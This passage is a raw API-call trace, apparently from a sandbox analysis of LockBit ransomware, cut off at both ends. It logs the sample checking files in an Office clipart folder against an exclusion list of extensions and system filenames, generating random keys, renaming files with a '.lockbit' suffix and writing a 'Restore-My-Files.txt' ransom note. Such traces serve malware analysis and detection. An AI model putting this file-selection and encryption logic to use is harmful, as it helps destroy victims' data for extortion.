ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bb77a00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0xce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01627_.WMF", cAlternateFileName="")) returned 1 [0162.846] lstrcmpiW (lpString1=".", lpString2="NA01627_.WMF") returned -1 [0162.846] lstrcmpiW (lpString1="..", lpString2="NA01627_.WMF") returned -1 [0162.846] PathFindExtensionW (pszPath="NA01627_.WMF") returned=".WMF" [0162.846] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.846] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.847] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.848] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.848] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01627_.WMF") returned 1 [0162.848] lstrcmpiW (lpString1="ntldr", lpString2="NA01627_.WMF") returned 1 [0162.848] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01627_.WMF") returned 1 [0162.848] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01627_.WMF") returned -1 [0162.848] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01627_.WMF") returned -1 [0162.848] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01627_.WMF") returned 1 [0162.848] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01627_.WMF") returned -1 [0162.848] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.849] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01627_.WMF") returned=".WMF" [0162.849] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.849] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.849] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.850] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.850] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.850] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.850] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01627_.WMF.lockbit") returned 72 [0162.850] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01627_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01627_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0162.851] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.851] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.851] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3296) returned 1 [0162.851] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.851] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.851] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.852] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.855] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01627_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01627_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.855] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.855] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.856] free (_Block=0x1fa2ed8) [0162.856] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01627_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.857] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.857] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.857] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f01d600, ftCreationTime.dwHighDateTime=0x1bd4be8, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8f01d600, ftLastWriteTime.dwHighDateTime=0x1bd4be8, nFileSizeHigh=0x0, nFileSizeLow=0xb9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01680_.WMF", cAlternateFileName="")) returned 1 [0162.857] lstrcmpiW (lpString1=".", lpString2="NA01680_.WMF") returned -1 [0162.857] lstrcmpiW (lpString1="..", lpString2="NA01680_.WMF") returned -1 [0162.857] PathFindExtensionW (pszPath="NA01680_.WMF") returned=".WMF" [0162.857] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.857] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.858] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.858] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01680_.WMF") returned 1 [0162.859] lstrcmpiW (lpString1="ntldr", lpString2="NA01680_.WMF") returned 1 [0162.859] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01680_.WMF") returned 1 [0162.859] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01680_.WMF") returned -1 [0162.859] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01680_.WMF") returned -1 [0162.859] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01680_.WMF") returned 1 [0162.859] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01680_.WMF") returned -1 [0162.859] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.859] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01680_.WMF") returned=".WMF" [0162.859] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.859] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.859] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.860] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.860] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01680_.WMF.lockbit") returned 72 [0162.860] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01680_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01680_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0162.861] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.861] malloc (_Size=0x40068) returned 0x3f70048 [0162.862] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2974) returned 1 [0162.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0162.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.863] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0162.863] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0162.931] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01680_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01680_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.931] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.931] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0162.932] free (_Block=0x1fa2ed8) [0162.932] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01680_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.932] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.932] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b6e4f00, ftCreationTime.dwHighDateTime=0x1bd4be8, ftLastAccessTime.dwLowDateTime=0x6a370b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8b6e4f00, ftLastWriteTime.dwHighDateTime=0x1bd4be8, nFileSizeHigh=0x0, nFileSizeLow=0xc88, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01682_.WMF", cAlternateFileName="")) returned 1 [0162.932] lstrcmpiW (lpString1=".", lpString2="NA01682_.WMF") returned -1 [0162.932] lstrcmpiW (lpString1="..", lpString2="NA01682_.WMF") returned -1 [0162.932] PathFindExtensionW (pszPath="NA01682_.WMF") returned=".WMF" [0162.932] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.932] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.933] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.933] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01682_.WMF") returned 1 [0162.933] lstrcmpiW (lpString1="ntldr", lpString2="NA01682_.WMF") returned 1 [0162.933] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01682_.WMF") returned 1 [0162.933] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01682_.WMF") returned -1 [0162.933] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01682_.WMF") returned -1 [0162.933] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01682_.WMF") returned 1 [0162.934] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01682_.WMF") returned -1 [0162.934] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.934] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01682_.WMF") returned=".WMF" [0162.934] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.934] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW 